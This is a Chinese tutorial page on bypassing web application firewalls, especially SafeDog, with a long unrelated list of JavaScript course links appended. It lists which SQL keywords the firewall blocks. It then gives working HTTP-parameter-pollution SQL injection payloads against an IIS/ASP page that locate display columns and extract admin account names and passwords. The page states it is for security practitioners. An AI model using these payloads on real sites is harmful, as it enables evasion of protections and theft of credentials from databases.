WAF安全拦截绕过思路和手法
时间:2022-07-28
本文章向大家介绍WAF安全拦截绕过思路和手法,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
[TOC]
注意:本文分享给安全从业人员,网站开发人员和运维人员在日常工作中使用和防范恶意攻击,请勿恶意使用下面描述技术进行非法操作。
0x00 介绍前言
收集之中
WAF绕过方法:
- HPP(参数污染)方式
判断注入: xor 可直接过大部分的防护(包括安全狗) order by 大部分WAF默认拦截(包括安全狗) union 不拦截 select 不拦截 union selec 不拦截 union select 拦截 注:以上是在GET方式下的结果
POST下: and 不拦截 union select 不拦截 底线为↓ union select 1,2 from 这里开始被拦截 实际上真正要绕过的是from是否被匹配
安全狗WAF
ByPass之HPP应用
描述:
一个有趣的注入点(可以使用其绕过SafeDog)
#正常访问
http://192.168.1.170/Production/PRODUCT_DETAIL.asp?id=1137
#HPP参数污染#且参数一为113 参数二为7
http://192.168.1.170/Production/PRODUCT_DETAIL.asp?id=113&id=7 #回显的结果为id=113, 7
WeiyiGeek.
结论:由HPP原理思路可知IIS/ASP解析同名参数同时传递的时候会将其进行采用”,”拼接分割;
我们继续深入学习:
#我们构造下面的PoC由于&id=x相当于 ,x 所以参数值的数字都会变成,数字(用post测试)
id=1137 union select 1&id=2&id=3&id=4&id=5&id=6&id=7&id=8&id=9&id=10&id=11&id=12&id=13&id=14&id=15&id=16&id=17&id=18&id=19&id=20&id=21&id=22%20from%20admin
#利用union爆出显位字段 3 , 15
继续注入查账号密码
id=1137%20union%20select%201&id=2&id=admin&id=4&id=5&id=6&id=7&id=8&id=9&id=10&id=11&id=12&id=13&id=14&id=password&id=16&id=17&id=18&id=19&id=20&id=21&id=22%20from%20admin
WeiyiGeek.
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法